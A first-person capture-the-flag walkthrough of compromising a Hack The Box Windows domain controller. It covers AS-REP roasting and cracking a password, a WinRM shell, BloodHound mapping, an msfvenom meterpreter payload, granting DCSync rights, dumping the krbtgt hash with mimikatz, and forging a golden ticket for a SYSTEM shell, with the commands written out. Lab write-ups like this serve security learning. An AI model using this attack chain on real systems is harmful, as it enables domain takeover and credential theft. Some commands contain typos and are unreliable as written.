A lot of open ports found in this windows box
53,88,135,139,389,445,464,593,636,3268,3269, First I am going to try smb on port 445 using smbmap
smbmap -H 10.10.10.161 to see if any of the shares are open, but nothing. At this point I run enum4linux hopefully getting some juicy usernames to try on smbmap.
enum4linux -U 10.10.10.161, I get a list of usernames and I write it to a notepad. I try some of the but nothing comes up.So at this point smb does’t do much for me. I try to look into ldap using jxplorer, but nothing there also. Since there is kerberos, I download impacket and look into the examples script. There is a script which allows me to grab tgt of some users which kerberos does not require them preauthentication. I will use this command
./GetNPUsers.py htb.local/ -no-pass -usersfile user.txt, I get a result of the tgt for user svc-alfresco, I crack this using hashcat, and get the password s3rvice.
Trying this user with smb does not give me much neither does with any other service on the ports we found. So I scan again using nmap on all ports and find out winrm port open
5985. I use a tool named evil-winrm to get a powershell shell on the box, and grab user.txt.
I upload to the box and import using
. .\bloodhound.ps1, 2 powershell scripts, first is bloodhound.ps1 and the other is powerview.ps1.
Invoke-Bloodhound -CollectionMethod All -LdapPort 389 -LdaPpass s3rvice, this would create a zip file which I copy to my local box, and after that I import it to bloodhound application to view a path to Domain admin.
I generate an exe file using msfvenom and upload it into the box using impacket-smbserver. I execute the file and get a meterpreter shell on my host. I create a new user using
net user fuxsocy passwordhere! /add and then add him to account operators group and exchange windows permission and
remote managemenet by typing
net GroupNAMEHERE group_name fuxsocy /add.
. .\powerview.ps1I type
Add-DomainObjectAcl -TargetIdentity htb.local -Rights DCSync. If no erros shows then I am good to go. I upload mimkatz on the box, and run it using
.\mimikatz.exe. Then I type lsa::dsync /user:krbtgt and grab the output from it.
Since I have the tgt of that krbtgt user I can use ticketer.py from impacket to create a golden ticket.
python ticketer.py -nthash 819af826bb148e603acb0f33d17632f8 -domain-sid S-1-5-21-3072663084-364016917-1341370565 -domain HTB.local administrator and then set the filename to a variable named KRB5CCNAME using
export KRB5CCNAME=administrator.ccache, now I have golden ticket which I can use with psexec to execute commands on the box as administator. I use
psexec.py -k -n email@example.com cmd.exe Which will pop a shell as nt authority\system.